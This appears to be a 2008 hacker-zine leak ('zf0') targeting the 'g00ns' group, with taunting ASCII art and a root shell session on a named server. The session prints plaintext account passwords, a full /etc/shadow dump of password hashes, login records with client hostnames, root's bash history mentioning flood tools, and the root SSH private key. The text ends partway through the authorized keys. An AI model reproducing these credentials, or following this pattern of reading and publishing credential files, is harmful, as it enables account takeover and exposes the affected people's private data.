############################################################# # # # Once Again Micro Penis Is # # __ # # .-----.--.--.--.-----.-----.--| | # # | _ | | | | | -__| _ | # # | __|________|__|__|_____|_____| # # |__| # # (c) zf0 2008# ############################################################# zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 g00ns zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 z3r0 -> tribal: its possible someone hacked the user account z3r0 -> tribal: but doubtful tribal -> z3r0: yeah but if thats true tribal -> z3r0: they wouldn't be able to change the bash history ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Current g00ns shell passwords: root:Yuh89Kiol0? bnc:dwAFkCWx barnseo:jatQeT77Q2be ~~~~~~~~~~~~~~~~~~~~~~~~~~~ [root@demon2 ~]# uname -a; id Linux demon2.rage-servers.com #11 SMP Mon Feb 11 22:15:20 PST 2008 i686 i686 i386 GNU/Linux uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [root@demon2 ~]# cat /etc/shadow root:$1$eE12wKEE$tmHFeYudmmO3rwwe7l7Cj1:13917:0:99999:7::: bin:*:13726:0:99999:7::: daemon:*:13726:0:99999:7::: adm:*:13726:0:99999:7::: lp:*:13726:0:99999:7::: sync:*:13726:0:99999:7::: shutdown:*:13726:0:99999:7::: halt:*:13726:0:99999:7::: mail:*:13726:0:99999:7::: news:*:13726:0:99999:7::: uucp:*:13726:0:99999:7::: operator:*:13726:0:99999:7::: games:*:13726:0:99999:7::: gopher:*:13726:0:99999:7::: ftp:*:13726:0:99999:7::: nobody:*:13726:0:99999:7::: dbus:!!:13726:0:99999:7::: mailnull:!!:13726:0:99999:7::: smmsp:!!:13726:0:99999:7::: nscd:!!:13726:0:99999:7::: vcsa:!!:13726:0:99999:7::: haldaemon:!!:13726:0:99999:7::: rpc:!!:13726:0:99999:7::: rpcuser:!!:13726:0:99999:7::: nfsnobody:!!:13726:0:99999:7::: sshd:!!:13726:0:99999:7::: pcap:!!:13726:0:99999:7::: rpm:!!:13726:0:99999:7::: named:!!:13726:::::: apache:!!:13726:::::: diradmin:!!:13726:::::: mysql:!!:13726:::::: webapps:!!:13726:0:99999:7::: majordomo:!!:13726:::::: admin:$1$k67PPtsg$vReIxhUQshkQHrgN8qop4/:13727:0:99999:7::: barnseo:$1$eSkx8Cwh$l/eNlfFan8WqvNlt3CcJd/:13943:0:99999:7::: bored:$1$VDoQ7SvP$hzgNmjDbAo1YV1UN1HnSa1:13727:0:99999:7::: churc0:$1$tsI0iJf7$6NvNZKfpK/NMNbhrQTmlA0:13727:0:99999:7::: connors:$1$2ULc9Bif$sujzvc6bBq/w9fUjMC/ru/:13727:0:99999:7::: every:$1$wC6e9J4r$fHgJBV5mvsjDfu1mbP1ya1:13727:0:99999:7::: evilcode:$1$w3V6Hy9R$Ulia4Vw0Ka2BppbF0/lH50:13732:0:99999:7::: excodeirc:$1$rFGBHx30$NQBXJyn58wCMprwtX6zYw0:13774:0:99999:7::: exploiterc:$1$VEmT3ImD$VxH8EvofWX8ewPX4M4wk00:13727:0:99999:7::: felosii:$1$G2Mg7vW9$SoUIbysYX.nTApiriA6CC/:13727:0:99999:7::: g00nsts395:$1$1joDOdxa$Us6bM7CJhw0BTgErxTI5p0:13748:0:99999:7::: grumpy:$1$dX3cnqpU$oApeYwRlHfDpoG4RpaGwD.:13727:0:99999:7::: illmob:$1$gFYsh9oD$LVzfHbh.UyLCGp/HoP2xC.:13727:0:99999:7::: pingyill:$1$5b3IbBeK$pRofjZ3/JiBjPG3OYgP900:13727:0:99999:7::: rageserver:$1$lI4HM14j$2vJACLQYNTxJDZ6GkJRBv0:13727:0:99999:7::: robo:$1$u0sPxruz$eaFFqL4tnXsKcCOkrq2/O.:13727:0:99999:7::: sn00g3s:$1$brOb0Seg$FGzBeV5S89j5AgDgYaRSG/:13970:0:99999:7::: void:$1$tBjUtZVx$6Vzt0IHhNIQU8QLU6lymO/:13727:0:99999:7::: alliancedn:$1$JitYsrIg$Mz0Q3fgnLDDmnEITkHB1t1:13727:0:99999:7::: aosw:$1$2EhcyqE8$b2JIrTsCg6svFPqe4bSvB.:13727:0:99999:7::: ntp:!!:13727:::::: hackrad:$1$pnZjslMq$F1X4eS3kW4DjnxNJq6l7w.:13727:0:99999:7::: mycorp:$1$7PzKv9I_$SdcZN/fvAe5M1/g.nV3Ve/:13727:0:99999:7::: ragedns:$1$0ZhTdSDG$8tIyV/igSTp2FW1DLg0bI.:13727:0:99999:7::: shoutcas:$1$EyPac5O4$twiXOZ2pCQF2N02Yn1ysF/:13732:0:99999:7::: g00ns83:$1$11pX9sPu$10H8SuDhVaqzctQl1hK/T.:13985:0:99999:7::: avahi:!!:13728:::::: xfs:!!:13728:::::: bnc:$1$oJ272Xoy$A/YVfI3PIEVShTgTfBKVY1:13729:0:99999:7::: felosi:$1$nsjb27Ih$r4cu3KkmTBUcHBnpKlcAd/:13729:0:99999:7::: egg:$1$IhIgFiwf$ZbLk7EMZ2mW9h5SZ.mibv.:13735:0:99999:7::: dougie:$1$xSp9e8mS$aiGml3legHEIUPrB5zyNp/:13737:0:99999:7::: proc:!!:13748:0:99999:7::: cstest:$1$ocq0fShx$6dKqaaMhVyvob5DW5sBeK1:13859:0:99999:7::: partyvan:!!$1$lGkCPwxP$aaKltWujl.3mkQjqgKJ311:13864:0:99999:7::: 40zzz:$1$I1xSLk9k$0.mmuo5Si8UlQXaUJ4VRF1:13869:0:99999:7::: tflux:$1$ftEvmzkA$RlkyQtPH.ebC0J8lWiZxm/:13875:0:99999:7::: hthhost:$1$sdsbg7Bd$UaK2rXwsmZjwQYV8/4FUa1:13877:0:99999:7::: party:$1$f2EVqqGx$H/sktpSQFCpoOz8tQpNsu/:13912:0:99999:7::: silc:$1$dhGqC6Gf$UEHea6QzCwrkfB8ZB2gDV1:13897:0:99999:7::: ident:!!:13910:0:99999:7::: lost:$1$5EpPopQR$0klUI/mKzjxPR0CV7qp2f/:13926:0:99999:7::: cunt:$1$7EyJ/1Qa$4Xy96JHb7dRjxxq.FDCsQ0:13947:0:99999:7::: tribal:$1$qF0PcFfr$76GBdRhLgM5lEGpjZQLPL1:13947:0:99999:7::: sixtyz:$1$9oLYqc3p$.KffXrzMGVAQ2bdOrgkoY1:13986:0:99999:7::: hanon:$1$oQBfvCtT$LymNfsGG9wHkUwKn41Cim/:13961:0:99999:7::: pvannet:$1$hYiASnKV$.CxXbIqEMR6kAoRRKVLfo1:13965:0:99999:7::: [root@demon2 ~]# ps auxwww | grep -v root | grep -v mysql USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND ftp 2319 0.0 0.0 2736 1424 ? Ss Mar18 0:00 proftpd: (accepting connections) dbus 3183 0.0 0.0 2784 672 ? Ss Feb11 0:00 dbus-daemon --system mail 3813 0.0 0.0 8760 712 ? Ss Feb11 0:36 /usr/sbin/exim -bd -q15m -oP /var/run/exim.pid avahi 4434 0.0 0.0 2600 648 ? Ss Feb11 0:00 avahi-daemon: running [demon2.local] 68 4450 0.0 0.0 5276 736 ? Ss Feb11 0:00 hald named 4618 0.0 0.4 48712 8296 ? Ssl Feb11 55:55 /usr/sbin/named -u named bnc 5470 0.0 0.0 5568 1560 ? S Feb11 0:53 ./psybnc apache 12745 0.0 0.3 113532 7368 ? Ss Apr16 0:00 lsphp -c /usr/local/lib bnc 14297 0.0 0.1 5544 2144 ? S Apr19 0:04 ./psybnc psybnc.gso.conf nobody 15071 0.0 0.0 8708 1292 ? Ss Apr01 0:00 /usr/local/directadmin/directadmin d 510 16899 0.0 0.1 6728 3232 ? S Apr14 0:00 /home/excodeirc/Unreal3.2/src/ircd evilcode 17493 0.0 0.8 19904 17704 ? S Apr19 1:08 /home/evilcode/newircd/Unreal3.2.7/src/ircd egg 20683 0.0 0.2 17204 5172 ? Sl Apr14 7:14 ./eggdrop-1.6.18 v0ltr0n.conf egg 20745 0.0 0.1 13380 3432 ? Sl Apr14 0:02 ./eggdrop sentry.conf egg 20748 0.0 0.1 13544 3420 ? Sl Apr14 0:00 ./eggdrop boneless.conf egg 20758 0.0 0.1 13404 3396 ? Sl Apr14 0:00 ./eggdrop keebler.conf egg 20770 0.0 0.1 4412 3428 ? Ss Apr14 0:31 /home/egg/efnet/fight hacker egg 20773 0.0 0.1 3548 2588 ? Ss Apr14 0:19 /home/egg/efnet/fight logic egg 20776 0.0 0.1 3588 2692 ? Ss Apr14 0:17 /home/egg/efnet/fight bloo egg 20779 0.0 0.1 3552 2640 ? Ss Apr14 0:18 /home/egg/efnet/fight etho egg 20793 0.0 0.1 3564 2720 ? Ss Apr14 0:17 /home/egg/efnet/fight notgay egg 20798 0.0 0.1 3576 2676 ? Ss Apr14 0:24 /home/egg/efnet/fight hthbot 513 23089 0.0 0.1 73380 2388 ? SNl Apr16 0:26 ./server_linux 513 23913 0.0 0.2 50844 5016 ? SNl Apr16 0:00 ./server_linux -PID=tsserver2.pid apache 28366 0.0 0.6 121208 14104 ? S 13:11 0:00 lsphp -c /usr/local/lib nobody 29950 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d nobody 29960 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d g00ns83 29999 0.0 0.5 114628 10976 ? S 13:26 0:00 lsphp -c /usr/local/lib sn00g3s 30011 0.9 0.5 114844 11788 ? S 13:26 0:00 lsphp -c /usr/local/lib every 30024 1.6 0.5 114452 12264 ? S 13:26 0:00 lsphp -c /usr/local/lib nobody 30111 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d nobody 30168 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d nobody 30170 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d apache 32186 0.0 0.6 16400 12960 ? S Apr16 4:36 lshttpd [root@demon2 ~]# ls -al total 18128 drwxr-x--- 14 root root 4096 Mar 27 16:14 . drwxr-xr-x 27 root root 4096 Mar 11 00:10 .. -rw-r--r-- 1 root root 16777216 Sep 17 2004 16mb.test.file.zip -rw------- 1 root root 1077 Jul 31 2007 anaconda-ks.cfg drwxr-xr-x 2 root root 4096 Sep 13 2007 ani -rw------- 1 root root 9305 Apr 21 13:23 .bash_history -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc -rw-r--r-- 1 root root 337529 Apr 17 2006 Bastille-3.0.9-1.0.noarch.rpm drwxrwxrwx 5 1000 1000 12288 Mar 17 19:47 c-ares-1.5.1 -rw-r--r-- 1 root root 445312 Nov 21 02:14 c-ares-1.5.1.tar.gz -rw-r--r-- 1 root root 20136 Dec 19 19:30 cores drwxr-xr-x 4 root root 4096 Feb 23 19:17 .cpan drwxr-xr-x 5 root root 4096 Feb 10 12:56 csf -rw-r--r-- 1 root root 238005 Jan 21 09:19 csf.tgz -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc drwx------ 2 root root 4096 Jan 25 16:29 .elinks -rw-r--r-- 1 root root 8192 Jan 6 17:37 flood -rw-r--r-- 1 root root 13333 Jul 31 2007 install.log -rw-r--r-- 1 root root 2551 Jul 31 2007 install.log.syslog -rw-r--r-- 1 root root 12033 Jan 6 17:30 ips -rw------- 1 root root 45 Apr 19 14:04 .lesshst drwxr-xr-x 4 root root 4096 Dec 31 01:35 lynis -rw-r--r-- 1 root root 46388 Dec 26 11:13 lynis-1.0.6.tar.gz -rw-r--r-- 1 root root 754 Feb 10 17:12 Makefile -rw-r--r-- 1 root root 0 Feb 10 17:12 Module.symvers -rw------- 1 root root 41 Jan 31 02:49 .my.cnf -rw------- 1 root root 419 Sep 29 2007 .nessusrc -rw-r--r-- 1 root root 51 Sep 29 2007 .nessusrc.cert -rw-r--r-- 1 root root 656 Jan 6 17:37 new -rw-r--r-- 1 root root 656 Jan 6 17:38 new1 drwxr-xr-x 3 root root 4096 Mar 25 13:40 newircd -rw-r--r-- 1 root root 1462 Aug 19 2007 opt.php -rw-r--r-- 1 root root 3502 Feb 10 16:03 ptpatch2008.c -rw-r--r-- 1 root root 5704 Feb 10 17:12 ptpatch2008.ko -rw-r--r-- 1 root root 126 Feb 10 17:12 .ptpatch2008.ko.cmd -rw-r--r-- 1 root root 870 Feb 10 17:12 ptpatch2008.mod.c -rw-r--r-- 1 root root 3404 Feb 10 17:12 ptpatch2008.mod.o -rw-r--r-- 1 root root 11168 Feb 10 17:12 .ptpatch2008.mod.o.cmd -rw-r--r-- 1 root root 3080 Feb 10 17:12 ptpatch2008.o -rw-r--r-- 1 root root 16774 Feb 10 17:12 .ptpatch2008.o.cmd drwxrwxr-x 3 666 666 4096 Sep 22 2007 rkhunter-1.3.0 -rw-r--r-- 1 root root 252011 Sep 22 2007 rkhunter-1.3.0.tar.gz -rw------- 1 root root 1024 Jan 31 05:43 .rnd drwxr-xr-x 4 1000 1000 4096 Nov 29 14:48 rootcheck-0.7 -rw-r--r-- 1 root root 42488 Mar 17 2006 rootcheck-0.7.tar.gz drwx------ 2 root root 4096 Feb 10 12:55 .ssh drwxr-x--- 2 root root 4096 Dec 11 17:39 .steam -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc drwxr-xr-x 2 root root 4096 Feb 10 17:12 .tmp_versions -rw-r--r-- 1 root root 42596 Aug 9 2007 tuning-primer.sh -rw-r--r-- 1 root root 11623 Jan 6 17:36 udpflood -rw-r--r-- 1 root root 12033 Jan 6 17:30 udpips [root@demon2 ~]# last -n 30 root pts/1 74-34-107-191.ds Mon Apr 21 03:44 - 13:23 (09:39) andrei@t ftpd27076 Sun Apr 20 17:01 - 17:07 (00:05) andrei@t ftpd21033 Sun Apr 20 16:06 - 16:11 (00:05) andrei@t ftpd18185 Sun Apr 20 15:40 - 15:56 (00:15) andrei@t ftpd14422 Sun Apr 20 15:04 - 15:20 (00:16) every ftpd13689 Sun Apr 20 09:56 - 10:03 (00:07) bnc pts/1 Sat Apr 19 20:27 - 20:31 (00:04) bnc pts/1 Sat Apr 19 17:53 - 18:39 (00:45) bnc pts/2 Sat Apr 19 15:03 - 15:06 (00:02) root pts/2 ip70-180-48-83.b Sat Apr 19 10:35 - 11:25 (00:50) every ftpd20255 Fri Apr 18 15:42 - 15:42 (00:00) every ftpd18019 Fri Apr 18 15:26 - 15:41 (00:15) root pts/0 fl-71-51-173-254 Wed Apr 16 19:52 - 20:43 (00:50) andrei@t ftpd32363 Wed Apr 16 17:33 - 17:37 (00:04) root pts/0 fl-71-51-173-254 Wed Apr 16 17:28 - 19:09 (01:41) andrei@t ftpd30547 Wed Apr 16 17:18 - 17:29 (00:11) andrei@t ftpd30546 Wed Apr 16 17:18 - 17:23 (00:05) root pts/0 fl-71-51-173-254 Tue Apr 15 21:14 - 21:57 (00:42) root pts/0 fl-71-51-173-254 Mon Apr 14 22:23 - 23:11 (00:47) root pts/0 fl-71-51-173-254 Mon Apr 14 13:46 - 14:28 (00:42) kl@60z.o ftpd10215 Mon Apr 14 00:32 - 00:32 (00:00) andrei@t ftpd19694 Sun Apr 13 20:40 - 20:45 (00:05) andrei@t ftpd12210 Sun Apr 13 19:22 - 19:36 (00:13) andrei@t ftpd10428 Sun Apr 13 19:03 - 19:11 (00:07) andrei@t ftpd9290 Sun Apr 13 18:52 - 18:57 (00:05) andrei@t ftpd9291 Sun Apr 13 18:52 - 18:57 (00:05) root pts/0 ip70-180-48-83.b Sat Apr 12 11:39 - 11:40 (00:00) root pts/0 ip70-180-48-83.b Sat Apr 12 10:02 - 10:06 (00:03) root pts/0 fl-71-51-173-254 Thu Apr 10 13:32 - 13:45 (00:12) root pts/0 fl-71-51-173-254 Mon Apr 7 17:43 - 18:36 (00:53) wtmp begins Sun Mar 2 09:43:08 2008 [root@demon2 ~]# cat /etc/issue CentOS release 5 (Final) Kernel \r on an \m [root@demon2 ~]# cat .bash_history w passwd g00ns83 top w cd /home ls ls pr0be cd g00ns83 ls cd public_html ls nano in.php ls katalyst/ nano includes/config.php nano includes/config.php chown includes/config.php g00ns83 chown g00ns83 includes/config.php ls includes ls -o includes ls ls -o ls image -o ls -o image chown g00ns83 * ls ls cd / ls makeuser cunt adduser cunt passwd cunt s ls cd /home/sn00g3s cd public_Html cd public_html ls mkdir hid nano hid/index.php chown sn00g3s chown sn00g3s * ls ls -o ls hid rm -rf hid cd /home/g00ns83/public_Html cd /home/g00ns83/public_html ls mkdir tribal cd tribal nano index.php rm index.php nano index.php rm index.php nano index.php rm index.php nano index.php cd /home/g00ns83 chown g00ns83 * w ls -o cd /home passwd cunt cd /home/cunt ls wget http://www.shoutcast.com/downloads/sc1-9-8/sc_serv_1.9.8_Linux.tar.gz ls tar -xzf sc_serv_1.9.8_Linux.tar.gz ls nano sc_serv.conf sudo cunt su cunt ls cd unrealold/ ls cd /home/excodeirc ls cd Unreal cd Unreal3.2 ls nano unrealircd.conf ls ls -o cd /home/evilcodeirc cd /home ls cd evilcode ls cd Unreal3.2/ ls nano unrealircd.conf cd /home/excodeirc cd Unreal3.2 ls nano unrealircd.conf ls -o cd /hom ls cd /home ls ls -o ls tmp ls asbestos cd asbestos cd domains ls cd asbestosbeware.org ls cd / ls w ls tmp ls ps -aux | grep ircd netstat | grep ircd ls netstat ddos ddos csf -d nano /etc/csf/csf.allow csf -d csf -r csf -d csf csf -c csf -r csf -d nano /etc/csf/csf.allow csf -d ddos syn synall ls ls -o ls root cd /home/pr0be ls rm -rf irssi-0.8.12 rm irssi-0.8.12.tar.gz ls userdel userdel -f pr0be cd /home ls useradd tribal passwd ls chown cunt * su cunt w passwd tribal ls nano /etc/passwd cd /home/tribal ls su tribal ls cd /home/tribal ls su tribal ls w cd / ls nano /etc/csf/csf.deny csf -r cd /home ls cd excodeirc/ ls cd Unreal cd Unreal3.2 ls nano unrealircd.conf nano unrealircd.conf cd /home ls cd evilcode/ ls cd Unreal3.2/ ls nano unrealircd.conf make install su tribal w ls who cd /home/excodeirc ls cd Unreal3.2 ls nano unrealircd.conf cd /home/evilcodeirc cd /home/evilcoders cd /home ls cd evilcode/ ls cd Unreal3.2/ ls nano unrealircd.conf nano unrealircd.conf cd /home/excodeirc ls cd Unreal3.2 ls nano unrealircd.conf nano unrealircd.conf nano /etc/csf/csf.deny csf -a /etc/csf w ddos ddos csf -r syn ls ls w ddos netstat w who ls cd / ls ls etc ls var ls bin ls * | grep ddos synd ls nano /etc/csf/csf.deny nst | grep netstat | grep tcodump -nn -vv tcpdump -nn -vv netstat | grep w netstat | grep w dos ls ddos syng ddos synd ps -aux kill -9 5174 ls ps -aux ls ls /home ls cd /home/evilcode ls cd Unreal3.2 ls ./unreal ./unreal start ps -aux kill -9 3549 ps -aux ls ls ../ ls ls ../../ su evilcode ps -aux ps -aux ls cd ../ ls cd ../ ls cd evilcode ls cd Unreal3.2 ls nano unrealircd.conf ls cd ../../ ls cd excodeirc ls cd Unreal3.2 ls nano unrealircd.conf su excodeirc w cd /home/excodeirc netstat ls cd Unreal3.2 ls nano unrealircd.conf csf -d w ls ./unreal stop ./unreal start nano unrealircd.conf cd /home/evilcoder cd /home ls cd evilcode/ ls cd Unreal3.2/ ls nano unrealircd.conf cd /home/excodeirc ls cd Unreal3.2 ls nano unrealircd.conf nano unrealircd.conf cd /etc/csf ls nano csf.deny nano unrealircd.conf cd /home/excodeirc/Unreal3.2 ls nano unrealircd.conf nano unrealircd.conf ls cd /home ls cd pr0be/ ls su pr0be ls su pr0be nano etc/passwd nano /etc/passwd cd /home/tribal su tribal ls cd /root ls wget http://daniel.haxx.se/projects/c-ares/c-ares-1.5.1.tar.gz wget http://daniel.haxx.se/projects/c-ares/c-ares-1.5.1.tar.gz ls tar -xzf c-ares-1.5.1.tar.gz ls cd c-ares-1.5.1 ls ./configure ls cat README make cat README make install ls cd /home/tribal su tribal w cd /home/excodeirc ls cd Unreal3.2 ls ./unreal stop nano unrealircd.conf ./unreal start cd /home ls cd evilcode/ ls cd Unreal3.2/ ls nano unrealircd.conf ls cd /home/excodeirc ls cd Unreal3.2 ls nano unrealircd.conf cd /home/excodeirc ls mkdir BULLSHIT ls rm -rf denora-1.2.0-RC4 rm denora-1.2.0-RC4.tar.gz ls ls psybnc rm psybnc/ ls rm -rf psybnc/ ls rm -rf BULLSHIT/ ls cd /home/evilcode ls cd Unreal3.2/ ls nano ircd.motd chown evilcode * cd /home/excodeirc cd Unreal3.2 ls chown excodeirc * nano unrealircd.conf ls ls w cd / nano unrealircd.conf ls ls /root ddos netstat ddos syn synd ddos csf -d ddos 10 ddos ddos ddos ddos csf csf -c csf -l w w cd / ls w netstat ls cd /home/evilcode ls cd unreal3.2 cd Unreal3.2 ls nano unrealircd.conf cd ../ ls cd ../ ls cd excodeirc ls cd Unreal3.2 ls nano unrealircd.conf dmesg top sh tuning* top clear top w ls cd /home ls cd excodeirc ls mkdir hightechhost cd hightechhost/ ls wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.18.tar.gz ls tar zxvf eggdrop1.6.18.tar.gz cd eggdrop1.6.18 ./configure make config make ls su excodeirc chown excodeirc * su excodeirc w ls cd /home ls cd excodeirc ls cd hightechhost/ ls cd eggdrop1.6.18 ls ls -o su excodeirc ls cd / ls cd home ls cd egg ls cd eggdrop ls su egg uname -a id egg su egg netstat | grep 33162 netstat killall fight netstat killall fight ps -aux su egg netstat uname -a ; id egg su egg ls cd /home/egg ls cd efnet/ su egg w w ls cat cores ls cd /home ls cd evilcode/ ls cd Unreal3.2/ ls nano unrealircd.conf nano unrealircd.conf nano unrealircd.conf nano unrealircd.conf nano unrealircd.conf nano unrealircd.conf nano unrealircd.conf cd /home/excodeirc ls cd Unreal ls cd Unreal3.2 ls nano unrealircd.conf cd /home/evilcode ls cd Unreal3.2/ ls nano unrealircd.conf cd /home/excodeirc ls cd Unreal3.2 ls nano unrealircd.conf cd /home/evilcode ls cd Unreal3.2/ ls nano unrealircd.conf ./Config make ./unreal stop ./unreal start ps -aux | grep ircd kill 3952 kill 10281 ps -aux kill 12472 killall ircd ./unreal start ls ./Config make ./unreal start cd $user ls mkdir newircd cd newircd ls wget http://www.blurryfox.com/unreal/Unreal3.2.7.tar.gz ls tar xzf Unreal3.2.7.tar.gz ls cd Unreal3.2.7 ls ./Config ls cd /home ls cd evilcode/ ls su evilcode w w ps -aux | grep ircd ls cd /home ls cd evilcode/ ls cd newircd/ ls su evilcode w ls cd / ls cd evilcode ls cd /home ls w cd evilcode/ ls w netstat -a la ls su evilcode ls su evilcoder su evilcode ls who cd / cd /home ls cd evilcode ls cd newircd/ ls cd Unreal3.2.7 ls su evilcode w ls cd / ls cd /home/evilcode ls cd newircd ls cd Unreal3.2.7 ls nano unrealircd.conf ls cd / ls cd home ls cd excodeirc/ ls cd Unreal3.2 ls nano unrealircd.conf ./unreal stop ./unreal start ./unreal start ./unreal stop nano unrealircd.conf ./unreal start ./unreal stop uptime ./unreal stop nano unrealircd.conf w passwd sn00ges passwd sn00g3s cat ircd.conf cat ircd.log netstat -a nst netstat -a w ls w cd / ls cd evilcode cd /home ls cd evilcode/ ls cd newircd/ su evilcode csf -a /etc/csf last | grep root nst cat /boot/grub/grub.conf cd /usr/src ls rm -rf linux* wget sstdns.com/kernel.tar.gz wget nix101.com/kernel.tar.gz tar zxvf kernel.ta.gz tar zxvf kernel.tar.gz ln -s linux- linux cd linux rm -rf .config wget sstdns.com/grsec mv grsec .config screen w ps -aux ; grep ircd cd /home cd evilcode ls su evilcode w ls cd / ps -aux kill 19912 kill 11341 ps -aux kill 11341 kill 11341 ps -aux kilall fight kill fight kill 3534 kill 3537 kill 3540 kill 3543 kill 3546 kill 3549 ps -aux kill 1439 kill 1499 ps-aux ps -aux w ddos netstat -a ls ls home cd home ls ls pvannet ls pvannet/public_html ls ls aosw ls aosw/public_html csf -a /etc/csf nano /etc/csf/csf.deny ping tracert ls w cd /home ls cd g00ns83 ls ls public_html/ ls cd / ls cd home ls g00ns83/backup mv g00ns83/backup/oldlayout g00ns83/public_html w cd /home/evilcode cd newircd/ su evilcode ddos syn netstat netstat -a ddos ddos 10 ls csf -r ls nano /etc/csf/csf.deny ls cd / l ls cd / ls cd /evilcode ls cd /home/evilcode ls cd newircd/ ls cd Unreal3.2.7 su evilcode w cd / cd /home ls cd evilcode/ ls cd newircd/ ls cd Unreal3.2.7 ls su evilcode ls cd ../../ ls ls evilcode ls ps -aux ls cd /home ls cd evilcode ls cd Unreal3.2 ls ps -aux ls su evilcode cd /home/evilcode ls cd newircd ls cd unreal3.2.7 cd Unreal3.2.7 ls su evilcode ls w cd / ls cd /home cd evilcode/ ls cd newircd l ls cd Unreal3.2.7 ls su evilcode ls cd / ls cd home ls cd excodeirc/ ls mv Unreal3.2 privateirc ls mv privateirc/ Unreal3.2 cp Unreal3.2 privateircd ls cp Unreal3.2 privateircd ls Unreal ls Unreal3.2 su excodeirc ls cd / cd /home ls cd egg/ ls cd eggdrop ls nano v0ltr0n.conf nano v0ltr0n.chan ./eggdrop-1.6.18 v0ltr0n.conf su egg w passwd g00ns83 w ls cd / su ls make install su sixtyz su sixtyz ls cd /home/sixtyz ls mkdir wee cd wee su sixtyz ls su sixtyz ls cd / su sixtyz su sixtyz ls cd / ls cd /home ls cd g00nsts395/ ls cd ts ls su g00nsts395 ls ps -aux cd /home ls cd evilcode ls cd newircd ls cd Unreal3.2.7 ls nano unrealircd.conf su evilcode up last last \ grep root cd /var/log/httpd/domains ls cat g00ns.net.log | grep 403 cat g00ns.net.log cat g00ns.net.log | grep http cat g00ns.net.log | grep regime cat g00ns.net.log | grep c99 cat g00ns.net.log | grep shell cat g00ns.net.log | grep 406 cat g00ns.net.log | grep 403 htc cat g00ns-forum.net.log | grep 403 [root@demon2 ~]# ls -al .ssh total 24 drwx------ 2 root root 4096 Feb 10 12:55 . drwxr-x--- 14 root root 4096 Mar 27 16:14 .. -rw------- 1 root root 668 Jul 31 2007 id_dsa -rw-r--r-- 1 root root 612 Jul 31 2007 id_dsa.pub -rw-r--r-- 1 root root 2630 Apr 14 11:40 known_hosts [root@demon2 ~]# cat .ssh/* -----BEGIN DSA PRIVATE KEY----- MIIBugIBAAKBgQCr+zFL0Hd8ONiBNi9HwL/rgZcyIi/cHbbhZ/Sra2AaDfSFivL5 XmtmaFgSVPbxCLWgxCtM8E8MGX/T/c/A2EFwqHfXgjLAyMNBuKDfumVYMwH51smL u5FrJhjt4qRgPnnG3W5Y1BkyoX28HvgnYHVNIGXcXe7GTutcIyGrrmYDNQIVAIKN sRm7Oi3Ql4Nc9/R997aQiZpNAoGAeDuTtliW+zn9ki5EKTVZCTM0EhGxarDF8JOz 6JPfAlCpHEBtpNkQwmM1Gi8/XHPmAfDnNV0Na02XruhNk1UnWITBlqdU73Q413zx LkWtyoPLECz2ySjpbTtatkcOTlDKroyZBxBEZPd3zLNClWfKAbW3mj02Pp5eMA11 eSfZoV8CgYAysoncbc8l0WCVF5+NF84bfbRCYLCzMKq7e4kVoyGwGcoVHjVihRa+ n/UmWxQx7Q4+DiuzzpyTFnSjUUlsxwnYXyg+9pswgyKi0FHxR01S+2b0laQNwnJp xp6T7yuSKLG3PacwFo+WWgVlMm7lafZHjKYBm0TE3ZdnBq3EM1TsbAIUeUGslYXH 8q7BsyrkvGrDpQAhjSI= -----END DSA PRIVATE KEY----- ssh-dss AAAAB3NzaC1kc3MAAACBAKv7MUvQd3w42IE2L0fAv+uBlzIiL9wdtuFn9Kt rYBoN9IWK8vlea2ZoWBJU9vEItaDEK0zwTwwZf9P9z8DYQXCod9eCMsDIw0G4oN+6ZV gzAfnWyYu7kWsmGO3ipGA+ecbdbljUGTKhfbwe+CdgdU0gZdxd7sZO61wjIauuZgM1A AAAFQCCjbEZuzot0JeDXPf0ffe2kImaTQAAAIB4O5O2WJb7Of2SLkQpNVkJMzQSEbFq sMXwk7Pok98CUKkcQG2k2RDCYzUaLz9cc+YB8Oc1XQ1rTZeu6E2TVSdYhMGWp1TvdDj XfPEuRa3Kg8sQLPbJKOltO1q2Rw5OUMqujJkHEERk93fMs0KVZ8oBtbeaPTY+nl4wDX V5J9mhXwAAAIAysoncbc8l0WCVF5+NF84bfbRCYLCzMKq7e4kVoyGwGcoVHjVihRa+n /UmWxQx7Q4+DiuzzpyTFnSjUUlsxwnYXyg+9pswgyKi0FHxR01S+2b0laQNwnJpxp6T 7yuSKLG3PacwFo+WWgVlMm7lafZHjKYBm0TE3ZdnBq3EM1TsbA== root@server.domain.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAz6mhC9bjyFZ4EYXzRu2C Z8QLdxeSm9z5Y4svIrDM7xWD11MsWArRV6FAdb29NKCTVGu4Bn/jZmvjzG0W8mSd1b4 AzdOm/T24+nGdfgKujuTonEHO3xMPomTdvmYsKYgn7JYboa5meUXD2hJJZ/nZUq2aSe 7ByYsS5vCEsBHGIv0= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAx8MbaIB8gbYx6GMEEO 